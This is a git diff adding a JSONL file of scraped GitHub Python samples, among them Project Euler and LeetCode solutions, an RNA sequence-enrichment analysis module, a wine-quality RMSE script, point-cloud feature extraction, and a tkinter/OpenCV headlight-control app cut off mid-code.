diff --git "a/6569.jsonl" "b/6569.jsonl" new file mode 100644--- /dev/null +++ "b/6569.jsonl" @@ -0,0 +1,2305 @@ +{"seq_id":"14201875741","text":"from math import factorial\n\n\ndef c(n, r):\n if not r <= n:\n return 0\n return factorial(n) / (factorial(r) * factorial(n - r))\n\n\ntarget = 100\nover = 1_000_000\n\namount = 0\nfor n_num in range(1,target+1):\n for r_num in range(n_num, 0, -1):\n value = c(n_num, r_num)\n if value > over:\n amount += 1\n\nprint(\"Amount of values for nCr for 1<=n<=%s that are over %s: %s\" % (target, over, amount))\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Project Euler/#53 - Combinatoric Selections.py","file_name":"#53 - Combinatoric Selections.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26214786371","text":"# https://leetcode.com/problems/path-sum-iv/\n# 1AC, what's the point?\nclass Solution:\n def pathSum(self, nums: List[int]) -> int:\n nodes = {}\n leaves = set()\n for x in nums:\n depth = x // 100 % 10 - 1\n row_id = x // 10 % 10 - 1\n val = x % 10\n node_id = (1 << depth) + row_id\n nodes[node_id] = val\n leaves.add(node_id)\n if (node_id >> 1) in nodes:\n nodes[node_id] += nodes[node_id >> 1]\n if (node_id >> 1) in leaves:\n leaves.remove(node_id >> 1)\n res = 0\n for x in leaves:\n res += nodes[x]\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/0501-1000/0666_path-sum-iv_1_AC.py","file_name":"0666_path-sum-iv_1_AC.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"9625607482","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Rachel Kelemen\r\n@deputy wizard: Joshua Brown\r\nFinalized April 2019\r\n\r\nThis module contains a function which calculates the enrichment of each sequence in each\r\nselection and writes the results to a csv file.\r\n\"\"\"\r\n\r\nimport csv\r\nimport numpy as np\r\nfrom statistics import mean, stdev\r\n\r\ndef calculate_enrichments(sequence_count_dict, read_counts, biosamples, sel_1_name,\r\n sel_2_name, sel_2_runs, output_format, full_sequence_format,\r\n rand_expected_pairs, working_folder_name, lib_name, min_lib_count):\r\n \"\"\"Calculates the enrichment of each sequence in eaach selection relative to the\r\n library and writes the results to results.csv.\r\n\r\n Parameters\r\n ---\r\n sequence_count_dict : dict\r\n biosample : list\r\n sel_1_name : str\r\n sel_2_name : str\r\n sel_2_runs : list\r\n output_format : str\r\n full_sequence_format : str\r\n rand_expected_pairs : list\r\n working_folder_name : str\r\n lib_name : str\r\n\r\n Returns\r\n ---\r\n results_table : list\r\n For each sequence the entry looks like\r\n [[randomized_sequence], [full_stem_sequence], []]\r\n\r\n Notes\r\n ---\r\n results_table structure\r\n COLUMN HEADER CONTENTS\r\n 0 Randomized sequence [formatted randomized sequence]\r\n 1 Full stem sequence [formatted full stem sequence]\r\n 2 Paired bases [number of paired bases]\r\n 3 Raw counts [lib_count, sel_1_count, sel_2_count...]\r\n 4 Fraction of total [lib_fraction, sel_1_fraction, sel_2_fraction...]\r\n 5 Fold enrichment [sel_1_fold_enrichment, sel_2_fold_enrichment...]\r\n 6 Enrichment factors [sel_1_enrichment_factor, sel_2_enrichment_factor...]\r\n 7 Enrichment ranks [sel_1_rank, sel_2_rank...]\r\n 8 Average enrichment factor [average enrichment factor]\r\n 9 StDev [enrichment factor standard deviation]\r\n 10 Rank 
[rank based on average enrichment factor]\r\n\r\n Results table is written to working_folder\\results\\lib_name results.csv\r\n \"\"\"\r\n\r\n # Setup\r\n # Set up column indices by name because it's clearer than referring to them by number.\r\n (Randomized_sequence, Full_stem_sequence, Paired_bases,\r\n Raw_counts, Fraction_of_total,\r\n Fold_enrichment, Enrichment_factor, Enrichment_rank,\r\n Avg_enrichment_factor, Stdev, Avg_rank) = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10)\r\n\r\n # Column headers\r\n header_list = ['Randomized sequence', 'Full stem sequence', 'Paired bases',\r\n 'Raw counts','Fraction of total',\r\n 'Fold enrichment', 'Enrichment factors', 'Enrichment ranks',\r\n 'Average enrichment factor', 'StDev', 'Average rank']\r\n\r\n # For pairing analysis, which pairs are considered valid?\r\n # Typically GU pairs are \"valid\" for tRNAs\r\n # A future goal is to come up with some metric for pairing strength\r\n # Pi stacking between adjacent bases?\r\n valid_pairs = {'A':['U'],\r\n 'C':['G'],\r\n 'G':['C','U'],\r\n 'U':['A','G']}\r\n\r\n # Sequences will be added to one of two tables, sequence_table or\r\n # low_abundance_table.\r\n\r\n # If there are any sequences which are present in selection runs but not present in\r\n # the library, this will cause divide by 0 errors later in the analysis.\r\n # Therefore, only certain parts of the analysis - calculating paired bases and % of\r\n # total reads - can be performed for these sequences.\r\n\r\n # Additionally, sequences which are only observed a very small number of times in the\r\n # library could lead to inaccurate enrichment factors - if a sequence was seen twice\r\n # instead of once in the library, for instance, the enrichment factor would be off\r\n # by a factor of two.\r\n\r\n # sequence_table holds sequences which were found >= min_lib_count times in the\r\n # library biosample.\r\n sequence_table = []\r\n # Enrichment factors will be calculated for these sequences.\r\n\r\n # low_abundance_table holds sequences which were identified < min_lib_count times\r\n # in the library biosample.\r\n low_abundance_table = []\r\n # Enrichment factors will still be calculated for sequences which were identified\r\n # > 0 times in the library biosample, but these values should be used cautiously.\r\n # Track how many sequences were not observed at all\r\n not_observed = 0\r\n\r\n # Lastly, we'll need to find the highest fold enrichment value for each selection\r\n # before we can calculate the enrichment factors.\r\n max_fold_enrichments = np.zeros(len(biosamples))\r\n\r\n\r\n # Read sequence counts from sequence_count_dict.\r\n for sequence in sequence_count_dict:\r\n # Set up table row sequence_data\r\n sequence_data = []\r\n for header in header_list:\r\n sequence_data.append([])\r\n\r\n # 0. 
Randomized sequence\r\n # Format sequences for output\r\n # Replace T's with U's, but keep the original as key_sequence for sequence_count_dict\r\n key_sequence = sequence\r\n sequence = sequence.replace('T', 'U')\r\n if output_format:\r\n # output_format is represented as 'NNN/NNN' where each N is to be replaced\r\n # with a base from sequence and all other characters are preserved.\r\n # Iterate through characters in output_format to generate formatted_sequence.\r\n formatted_sequence = ''\r\n # i represents the current position in sequence, starting at the beginning.\r\n i = 0\r\n for c in output_format:\r\n if c == 'N':\r\n formatted_sequence += sequence[i]\r\n i += 1\r\n else:\r\n formatted_sequence += c\r\n else:\r\n formatted_sequence = sequence\r\n sequence_data[Randomized_sequence].append(formatted_sequence)\r\n\r\n # 1. Full stem sequence\r\n # Allows visualization of an entire stem, even if only part of the stem was\r\n # randomized in the lirbary, and facilitates comparison between libraries in the\r\n # same region.\r\n # Similar to how formatted_sequence is generated\r\n if full_sequence_format:\r\n full_sequence = ''\r\n # i represents the current position in sequence, starting at the beginning.\r\n i = 0\r\n for c in full_sequence_format:\r\n if c == 'N':\r\n full_sequence += sequence[i]\r\n i += 1\r\n else:\r\n full_sequence += c\r\n else:\r\n full_sequence = formatted_sequence\r\n sequence_data[Full_stem_sequence].append(full_sequence)\r\n\r\n # 2. Paired bases\r\n # Count how many bases in the sequence are paired, based on valid_pairs\r\n # This uses sequence, not formatted_sequence\r\n # Start with 0 pairs\r\n paired = 0\r\n # Iterate through expected pairs using rand_expected_pairs coordinates, which only\r\n # include the randomized bases (unlike expected_pairs which provides pair\r\n # coordinates for the full sequence).\r\n for pair in rand_expected_pairs:\r\n # Extract coordinates and check for pairs\r\n a, b = pair[0], pair[1]\r\n if sequence[a] in valid_pairs[sequence[b]]:\r\n paired += 1\r\n sequence_data[Paired_bases].append(paired)\r\n\r\n # 3. Raw counts and\r\n # 4. Fraction of total\r\n for raw_count, total in zip(sequence_count_dict[key_sequence], read_counts):\r\n sequence_data[Raw_counts].append(raw_count)\r\n sequence_data[Fraction_of_total].append(raw_count/total)\r\n\r\n # Sequences found in library biosample\r\n # Calculate the change in abundance before and after each selection,\r\n # relative to the library.\r\n if sequence_data[Raw_counts][0] > 0:\r\n # 6. 
Fold enrichments\r\n library_abundance = sequence_data[Fraction_of_total][0]\r\n for selection_abundance, i in zip(sequence_data[Fraction_of_total],\r\n np.arange(len(max_fold_enrichments), dtype=int)):\r\n fold_enrichment = selection_abundance / library_abundance\r\n sequence_data[Fold_enrichment].append(fold_enrichment)\r\n # Update max_fold_enrichments unless the value comes from a low abundance\r\n # sequence.\r\n if sequence_data[Raw_counts][0] >= min_lib_count:\r\n if fold_enrichment > max_fold_enrichments[i]:\r\n max_fold_enrichments[i] = fold_enrichment\r\n\r\n if sequence_data[Raw_counts][0] >= min_lib_count:\r\n sequence_table.append(sequence_data)\r\n else:\r\n low_abundance_table.append(sequence_data)\r\n not_observed += 1\r\n\r\n # Sequences not found in library biosample\r\n # Enrichment cannot be calculated because the library abundance is 0.\r\n # Calculate the value if the library count was 1\r\n else:\r\n # What would library_abundance be if the library count was 1?\r\n library_abundance = 1 / read_counts[0]\r\n for selection_abundance, i in zip(sequence_data[Fraction_of_total],\r\n np.arange(len(max_fold_enrichments))):\r\n fold_enrichment = selection_abundance / library_abundance\r\n sequence_data[Fold_enrichment].append(fold_enrichment)\r\n # Do not update fold enrichments.\r\n low_abundance_table.append(sequence_data)\r\n\r\n\r\n # 6. Enrichment factors,\r\n # 8. Average enrichment factors, and\r\n # 9. StDev\r\n # Once finished iterating through all sequences and adding to tables, use\r\n # max_fold_enrichments to determine enrichment factor for each sequence\r\n # enrichment_factor = fold_enrichment / max_fold_enrichment\r\n for table in [sequence_table, low_abundance_table]:\r\n for sequence_data in table:\r\n for fold_enrichment, max_fold_enrichment in zip(sequence_data[Fold_enrichment],\r\n max_fold_enrichments):\r\n enrichment_factor = fold_enrichment / max_fold_enrichment\r\n sequence_data[Enrichment_factor].append(enrichment_factor)\r\n # Calculate average enrichments\r\n # If there are distinctly identified sel_1 and sel_2 runs (e.g. 1x vs 2x TAG)\r\n # Calculate three means and stdevs: [sel_1_mean, sel_2_mean, all_sels_mean]\r\n if sel_2_runs:\r\n sel_1_enrichment_factors = sequence_data[Enrichment_factor][1:-len(sel_2_runs)]\r\n sel_2_enrichment_factors = sequence_data[Enrichment_factor][-len(sel_2_runs):]\r\n sequence_data[Avg_enrichment_factor].append(mean(sel_1_enrichment_factors))\r\n sequence_data[Avg_enrichment_factor].append(mean(sel_2_enrichment_factors))\r\n if len(sel_1_enrichment_factors) > 1:\r\n sequence_data[Stdev].append(stdev(sel_1_enrichment_factors))\r\n else:\r\n sequence_data[Stdev].append(0)\r\n if len(sel_2_enrichment_factors) > 1:\r\n sequence_data[Stdev].append(stdev(sel_2_enrichment_factors))\r\n else:\r\n sequence_data[Stdev].append(0)\r\n # Calculate the mean enrichment factor and stdev for all selections.\r\n all_enrichment_factors = sequence_data[Enrichment_factor][1:]\r\n sequence_data[Avg_enrichment_factor].append(mean(all_enrichment_factors))\r\n if len(all_enrichment_factors) > 1:\r\n sequence_data[Stdev].append(stdev(all_enrichment_factors))\r\n else:\r\n sequence_data[Stdev].append(0)\r\n\r\n # 7. Rank by enrichment factors and\r\n # 9. 
Rank by average enrichment factor(s)\r\n for table in [sequence_table, low_abundance_table]:\r\n # Individual selection enrichment factors\r\n for i in np.arange(len(biosamples)):\r\n # Sort sequence_table by enrichment factor i, largest values first\r\n table = sorted(table, key = lambda x: x[Enrichment_factor][i],\r\n reverse=True)\r\n # Add rank+1 to sequence_table (add 1 to start at 1 not 0)\r\n for rank in range(len(table)):\r\n table[rank][Enrichment_rank].append(rank+1)\r\n # Average enrichment factor(s)\r\n # How many enrichment factors to expect?\r\n if sel_2_runs:\r\n n = 3\r\n else:\r\n n = 1\r\n for i in np.arange(n):\r\n # Sort sequence_table by enrichment factor i, largest values first\r\n table = sorted(table, key = lambda x: x[Avg_enrichment_factor][i],\r\n reverse=True)\r\n # Add rank+1 to sequence_table (add 1 to start at 1 not 0)\r\n for rank in range(len(table)):\r\n table[rank][Avg_rank].append(rank+1)\r\n\r\n # Sort tables by average enrichment factor outside of the above loop\r\n sequence_table = sorted(sequence_table, key = lambda x: x[Avg_enrichment_factor][-1],\r\n reverse=True)\r\n low_abundance_table = sorted(low_abundance_table, key = lambda x: x[Avg_enrichment_factor][-1],\r\n reverse=True)\r\n\r\n # Print results\r\n print('/nStats for the library run:')\r\n print('Of {:,} sequences, {:,} were observed >= {} times'.format(\r\n len(sequence_count_dict), len(sequence_table), min_lib_count))\r\n print('{:,} sequences were observed < {} times, with {} not observed'.format(\r\n len(low_abundance_table), min_lib_count, not_observed))\r\n\r\n print('/nMost enriched sequence: ', sequence_table[0][Randomized_sequence])\r\n print('Least enriched sequence: ', sequence_table[-1][Randomized_sequence])\r\n\r\n print('/nData for the top sequence:')\r\n for header, value in zip(header_list, sequence_table[0]):\r\n print(header, value)\r\n\r\n\r\n # Write the results to csv files.\r\n # Tables are already sorted by average enrichment factor.\r\n # Table structure reminder:\r\n '''\r\n COLUMN HEADER CONTENTS\r\n 0 Randomized sequence [formatted randomized sequence]\r\n 1 Full stem sequence [formatted full stem sequence]\r\n 2 Paired bases [number of paired bases]\r\n 3 Raw counts [lib_count, sel_1_count, sel_2_count...]\r\n 4 Fraction of total [lib_fraction, sel_1_fraction, sel_2_fraction...]\r\n 5 Fold enrichment [sel_1_fold_enrichment, sel_2_fold_enrichment...]\r\n 6 Enrichment factors [sel_1_enrichment_factor, sel_2_enrichment_factor...]\r\n 7 Enrichment ranks [sel_1_rank, sel_2_rank...]\r\n 8 Average enrichment factor [average enrichment factor]\r\n 9 StDev [enrichment factor standard deviation]\r\n 10 Rank [rank based on average enrichment factor]\r\n '''\r\n\r\n for table, file_name_end in zip([sequence_table, low_abundance_table], [' Results.csv',\r\n ' Low abundance sequences.csv']):\r\n output_file_address = working_folder_name + '//Results//' + lib_name + file_name_end\r\n with open(output_file_address, 'w', newline='') as output_file:\r\n # Clear any previous data\r\n output_file.truncate(0)\r\n\r\n # Write\r\n output_writer = csv.writer(output_file)\r\n # Write headers and subheaders\r\n header_row = []\r\n subheader_row = []\r\n # Randomized sequence, Full stem sequence, and Paired bases each only\r\n # contain 1 value.\r\n for header in header_list[Randomized_sequence:Raw_counts]:\r\n header_row.append(header)\r\n subheader_row.append('')\r\n # Raw counts, Fraction of total, Fold enrichment, Enrichment factors, and\r\n # Enrichment ranks have one value for each 
biosample.\r\n for header in header_list[Raw_counts:Avg_enrichment_factor]:\r\n header_row.append(header)\r\n for l in range(len(biosamples)-1):\r\n header_row.append('')\r\n for biosample in biosamples:\r\n subheader_row.append(biosample)\r\n # Average enrichment factor and Rank 3 values if there are distinct sel_1 and\r\n # sel_2 conditions, [Sel_1, Sel_2, and All selections].\r\n if sel_2_runs:\r\n for header in header_list[Avg_enrichment_factor:]:\r\n header_row.append(header)\r\n header_row.append('')\r\n header_row.append('')\r\n for selection_name in [sel_1_name, sel_2_name, 'All selections']:\r\n subheader_row.append(selection_name)\r\n # Otherwise there is just one value for all selections.\r\n else:\r\n for header in header_list[Avg_enrichment_factor:]:\r\n header_row.append(header)\r\n subheader_row.append('All selections')\r\n output_writer.writerow(header_row)\r\n output_writer.writerow(subheader_row)\r\n\r\n # Write data\r\n for sequence_data in table:\r\n data_row = []\r\n for column in sequence_data:\r\n for value in column:\r\n data_row.append(value)\r\n output_writer.writerow(data_row)\r\n\r\n print('/nData written to')\r\n print(output_file_address)\r\n\r\n\r\n return sequence_table, low_abundance_table","repo_name":"chatterjeelab2022/VADER","sub_path":"calculate_enrichments.py","file_name":"calculate_enrichments.py","file_ext":"py","file_size_in_byte":17952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35927762954","text":"#This program gives the weight of wine parameters for the quality equation\r\n#Parameters taking into consideration: FIXED ACIDITY, pH, ALCOHOL\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom math import sqrt\r\nimport quality_equation as qe\r\n\r\n\r\n# Preprocessing Input data\r\ndata = pd.read_csv('wines_red_all_parameters.csv')\r\n\r\n\r\n#Compute the weight of each parameter on the qaulity equation,\r\npar=qe.parameters()\r\n\r\n#Create computed quality and real quality vector\r\nq_computed=[]\r\nq=[]\r\n\r\nnumber_samples=1000\r\nstart=0\r\nfor i in range(start,start+number_samples):\r\n wine = data.iloc[i,:]\r\n\r\n q_pred = wine[0]*par[0] + wine[8]*par[1] + wine[10]*par[2]\r\n q_computed.append(round(q_pred))\r\n q.append(wine[11])\r\n\r\n\r\n\r\nerror=0\r\nfor i in range(number_samples):\r\n er=(q[i]-q_computed[i])*(q[i]-q_computed[i])\r\n error = error + er\r\nprint(error)\r\n\r\n\r\nRMSE=sqrt(error/number_samples)\r\nprint('The value of the RMSE is: ' + str(RMSE))\r\n","repo_name":"ruchawaghulde/Wine-Quality-Prediction","sub_path":"Codes/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23808226284","text":"import numpy as np\r\nimport pandas as pd\r\nfrom skimage import color\r\nfrom nss_functions import * \r\nfrom pyntcloud import PyntCloud\r\nimport os \r\n\r\ndef get_feature_vector(objpath): \r\n #load colored point cloud\r\n print(\"Begin loading point cloud\")\r\n cloud = PyntCloud.from_file(objpath)\r\n \r\n #begin geometry projection\r\n print(\"Begin geometry feature extraction.\")\r\n k_neighbors = cloud.get_neighbors(k=10)\r\n ev = cloud.add_scalar_field(\"eigen_values\", k_neighbors=k_neighbors)\r\n cloud.add_scalar_field(\"curvature\", ev=ev)\r\n cloud.add_scalar_field(\"anisotropy\",ev=ev)\r\n cloud.add_scalar_field(\"linearity\",ev=ev)\r\n cloud.add_scalar_field(\"planarity\",ev=ev)\r\n 
cloud.add_scalar_field(\"sphericity\",ev=ev)\r\n curvature = cloud.points['curvature(11)'].to_numpy()\r\n anisotropy = cloud.points['anisotropy(11)'].to_numpy()\r\n linearity = cloud.points['linearity(11)'].to_numpy()\r\n planarity = cloud.points['planarity(11)'].to_numpy()\r\n sphericity = cloud.points['sphericity(11)'].to_numpy()\r\n\r\n\r\n #begin color projection\r\n print(\"Begin color feature extraction.\")\r\n rgb_color = cloud.points[['red','green','blue']].to_numpy()/255\r\n lab_color = color.rgb2lab(rgb_color)\r\n l = lab_color[:,0]\r\n a = lab_color[:,1]\r\n b = lab_color[:,2]\r\n \r\n \r\n print(\"Begin NSS parameters estimation.\")\r\n # compute nss parameters\r\n nss_params = []\r\n # compute color nss features\r\n for tmp in [l,a,b]:\r\n params = get_color_nss_param(tmp)\r\n #flatten the feature vector\r\n nss_params = nss_params + [i for item in params for i in item]\r\n # compute geomerty nss features\r\n for tmp in [curvature,anisotropy,linearity,planarity,sphericity]:\r\n params = get_geometry_nss_param(tmp)\r\n #flatten the feature vector\r\n nss_params = nss_params + [i for item in params for i in item]\r\n return nss_params\r\n\r\n#demo\r\nobjpath = \"models/hhi_5.ply\"\r\nfeatures = get_feature_vector(objpath)\r\n\r\n#show the features\r\ncnt = 0\r\nfor feature_domain in ['l','a','b']:\r\n for param in [\"mean\",\"std\",\"entropy\"]:\r\n print(feature_domain + \"_\" + param + \": \" + str(features[cnt]))\r\n cnt = cnt + 1\r\nfor feature_domain in ['curvature','anisotropy','linearity','planarity','sphericity']:\r\n for param in [\"mean\",\"std\",\"entropy\",\"ggd1\",\"ggd2\",\"aggd1\",\"aggd2\",\"aggd3\",\"aggd4\",\"gamma1\",\"gamma2\"]:\r\n print(feature_domain + \"_\" + param + \": \" + str(features[cnt]))\r\n cnt = cnt + 1\r\n","repo_name":"zzc-1998/NR-3DQA","sub_path":"feature_extract_pc/feature_extract.py","file_name":"feature_extract.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"17722577329","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import filedialog as fd\nimport cv2\nimport numpy as np\nimport random\nimport os.path\nfrom os import path\nfrom PIL import Image, ImageFont, ImageDraw, ImageTk\nimport sched, time\nimport threading\nimport moviepy.editor as mp\nimport serial\n\nrandom.seed(100)\n\n\n#arayüz tanımları\nroot = Tk() \nroot.title(\"Etkin Araç Far Ayarlama Uygulaması\") \nroot.maxsize(900, 600) \nroot.config(bg=\"#008000\") \n\nleft_frame = Frame(root, width=200, height=500, bg='grey')\nleft_frame.grid(row=0, column=0, padx=10, pady=5)\nright_frame = Frame(root, width=650, height=400, bg='grey')\nright_frame.grid(row=0, column=1, padx=10, pady=5)\n\ndef check_int(s):\n if s[0] in ('-', '+'):\n return s[1:].isdigit()\n return s.isdigit()\n\ndef DrawImageBox(image):\n for widget in right_frame.winfo_children():\n widget.destroy()\n Label(right_frame, image=image).grid(row=0,column=0, padx=5, pady=5)\n\nschedule = sched.scheduler(time.time, time.sleep)\ndef PrintScreen(textString):\n img = Image.new('RGBA' ,(650,400), 'grey')\n font= ImageFont.truetype(\"arial.ttf\",15)\n w,h= font.getsize(textString)\n draw = ImageDraw.Draw(img)\n draw.text(((650-w)/2,(400-h)/2), textString,font=font, fill='white')\n image = ImageTk.PhotoImage(img)\n schedule.enter(5, 1, DrawImageBox(image))\n schedule.run()\n\ndef ResizeVideo(videoPath):\n if path.exists(\"temp/movie_temp_\" + os.path.basename(videoPath) +\".mp4\"):\n print (\"video 
işlemiş\" )\n #os.remove(\"movie_temp.mp4\")\n else:\n clip = mp.VideoFileClip(videoPath)\n clip_resized = clip.resize(height=360) \n clip_resized.write_videofile(\"temp/movie_temp_\" + os.path.basename(videoPath) +\".mp4\")\n \n\nLabel(left_frame, text=\"Eren OKUR 21908613\\nOtomotiv Proje Çalışması\").grid(row=0, column=0, padx=5, pady=5)\n\ndef CreateDirectory(givenPath):\n try:\n os.makedirs(givenPath)\n except OSError:\n print (\"dizin oluşturma yapılamadı: %s \" % givenPath)\n else:\n print (\"dizin başarılı şekilde oluşturuldu %s\" % givenPath)\n\n\nif path.exists('temp') and path.exists('data') and path.exists('data/student.jpg'):\n studentRawimage = Image.open(\"data/student.jpg\")\n studentRawimage = studentRawimage.resize((150, 150), Image.ANTIALIAS)\n studentImage = ImageTk.PhotoImage(studentRawimage)\n Label(left_frame, image=studentImage).grid(row=1, column=0, padx=5, pady=5)\n img = Image.new('RGBA' ,(650,400), 'grey')\n textString = \"Hoş geldiniz...\\nÖnce bir video seçiniz \\nSonra yola çıka tıklayınız\"\n font= ImageFont.truetype(\"arial.ttf\",15)\n w,h= font.getsize(textString)\n draw = ImageDraw.Draw(img)\n draw.text(((650-w)/2,(400-h)/2), textString,font=font, fill='white')\n image = ImageTk.PhotoImage(img)\n DrawImageBox(image)\nelse:\n if not path.exists('temp'):\n CreateDirectory('temp');\n if not path.exists('data'):\n CreateDirectory('data');\n img = Image.new('RGBA' ,(650,400), 'white')\n if not path.exists(\"data/student.jpg\"):\n textString = \"Hoş geldiniz...\\nBir video seçerek işleme başlayabilirsiniz\\nBir adet uyarı mavcut:\\nÖğrenci resmi bulunamadı.\\nÖğrenci resmini data dizininin içine student.jpg ismi ile yapıştırınız.\"\n else:\n textString = \"Hoş geldiniz...\\nÖnce bir video seçiniz \\nSonra yola çıka tıklayınız\"\n font= ImageFont.truetype(\"arial.ttf\",15)\n w,h= font.getsize(textString)\n draw = ImageDraw.Draw(img)\n draw.text((100,150), textString,font=font, fill='white')\n image = ImageTk.PhotoImage(img)\n DrawImageBox(image)\n\n\n\ntool_bar = Frame(left_frame, width=180, height=185)\ntool_bar.grid(row=2, column=0, padx=5, pady=5)\n\ndef ChooseVideo():\n ChooseVideo.VideoPath = \"\"\n file = fd.askopenfile()\n if file: \n ChooseVideo.VideoPath = file.name\n ResizeVideo(ChooseVideo.VideoPath)\n PrintScreen(\"Video yolu:\\n\" + os.path.basename(ChooseVideo.VideoPath) + \" seçildi\")\n\ndef img_estim(img):\n thrshldsunnyMin= 60\n thrshldshortMax = 40\n thrshldshortMin = 20\n thrshldlongMax = 20\n thrshldlongMin = 0\n thrshlddayMax = 60\n thrshlddayMin = 40\n meanValue = np.mean(img)\n if meanValue > thrshldsunnyMin :\n #return 'light' if is_light else 'dark'\n return 'nolight'\n if thrshldshortMax > meanValue > thrshldshortMin:\n return 'nightshort'\n if thrshldlongMax > meanValue > thrshldlongMin:\n return 'nightshort'\n if thrshlddayMax > meanValue > thrshlddayMin:\n return 'daylight'\n\ndef ProcessTravel(IsComActive):\n if hasattr(ChooseVideo, 'VideoPath'):\n cap = cv2.VideoCapture(\"temp/movie_temp_\" + os.path.basename(ChooseVideo.VideoPath) +\".mp4\")\n fgbg = cv2.createBackgroundSubtractorMOG2(history=500, detectShadows=True) # filter model detec gery shadows for removing\n size = (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))) \n fourcc = cv2.VideoWriter_fourcc(*'mp4v') \n out = cv2.VideoWriter('temp/video.avi',fourcc ,20,size) #20 number of frames per second\n frameID = 0\n contours_info = []\n static_back = None\n time = []\n dayEstimationStringTemp = \"Degerlendiriliyor\"\n MotionAliasTemp = 
\"Degerlendiriliyor\"\n dayEstimationStringAlias = \"Degerlendiriliyor\"\n MotionAlias = \"Degerlendiriliyor\"\n actionBufferCycle= 60;\n dayEstimationCycle= 0;\n MotionAliasCycle= 0;\n areaOfVideoFrame = size[0]* size[1] \n notification = FALSE\n # main loop:\n while True:\n ret, frame = cap.read()\n if ret:\n original_frame = frame.copy()\n motion_frame = frame.copy()\n carMotion = 0\n gray = cv2.cvtColor(motion_frame, cv2.COLOR_BGR2GRAY) \n gray = cv2.GaussianBlur(gray, (21, 21), 0) \n if static_back is None: \n static_back = gray \n continue\n diff_frame = cv2.absdiff(static_back, gray) \n thresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1] \n thresh_frame = cv2.dilate(thresh_frame, None, iterations = 2) \n cnts,_ = cv2.findContours(thresh_frame.copy(), \n cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \n for contour in cnts: \n motionValue = cv2.contourArea(contour)\n if motionValue < 10000: \n carMotion = 0 \n else:\n carMotion = 1\n break\n fgmask = fgbg.apply(frame)\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2, 2))\n closing = cv2.morphologyEx(fgmask, cv2.MORPH_CLOSE, kernel)\n opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, kernel)\n dilation = cv2.dilate(opening, kernel, iterations = 2)\n dilation[dilation < 240] = 0\n dayEstimationString = img_estim(original_frame)\n contours, hierarchy = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n LightSourceDetectionCount = 0\n ListSourceSize = (0,0)\n for cID, contour in enumerate(contours):\n M = cv2.moments(contour)\n if M['m00'] < 400:\n continue\n c_centroid = int(M['m10']/M['m00']), int(M['m01']/M['m00'])\n c_area = M['m00']\n try:\n c_perimeter = cv2.arcLength(contour, True)\n except:\n c_perimeter = cv2.arcLength(contour, False)\n c_convexity = cv2.isContourConvex(contour)\n (x, y, w, h) = cv2.boundingRect(contour)\n br_centroid = (x + int(w/2), y + int(h/2)) \n LightSourceDetectionCount = LightSourceDetectionCount + 1\n if x+w * y+h > ListSourceSize[0] * ListSourceSize[1]:\n ListSourceSize = (x+w,y+h)\n if dayEstimationString != \"nolight\":\n cv2.rectangle(original_frame,(x,y),(x+w,y+h),(0,255,0),2)\n cv2.putText(original_frame, str(cID), (x+w,y+h), cv2.FONT_HERSHEY_PLAIN, 3, (127, 255, 255), 1)\n contours_info.append([cID,frameID,c_centroid,br_centroid,c_area,c_perimeter,c_convexity,w,h])\n cv2.moveWindow('fg', 40,30)\n cv2.imshow('fg',dilation)\n font = cv2.FONT_HERSHEY_SIMPLEX \n textColor = color = (255, 255, 255)\n IsNodifyActive = False\n areaOfLightSource = ListSourceSize[0]*ListSourceSize[1]\n if dayEstimationString == \"nolight\" or dayEstimationString == \"daylight\" :\n if areaOfLightSource > areaOfVideoFrame / 2 and dayEstimationStringTemp == \"nightshort\" :\n notification = True\n dayEstimationString = \"nightshort\"\n IsNodifyActive = True\n else:\n notification = False\n\n\n if dayEstimationStringTemp == \"nightshort\" and dayEstimationString == \"nightshort\" and LightSourceDetectionCount == 0:\n dayEstimationString = \"nightlong\"\n\n if carMotion:\n MotionAliasTemp = \"haretli\" \n else:\n dayEstimationStringAlias = dayEstimationStringAlias \n MotionAliasTemp = \"arac duruyor\"\n\n if MotionAliasTemp != MotionAlias:\n MotionAliasCycle = MotionAliasCycle + 1\n if MotionAliasCycle >= actionBufferCycle:\n MotionAlias = MotionAliasTemp\n MotionAliasCycle = 0\n\n if dayEstimationStringTemp != dayEstimationString:\n dayEstimationCycle = dayEstimationCycle + 1\n if dayEstimationCycle >= actionBufferCycle:\n dayEstimationCycle = 0\n if MotionAlias == 
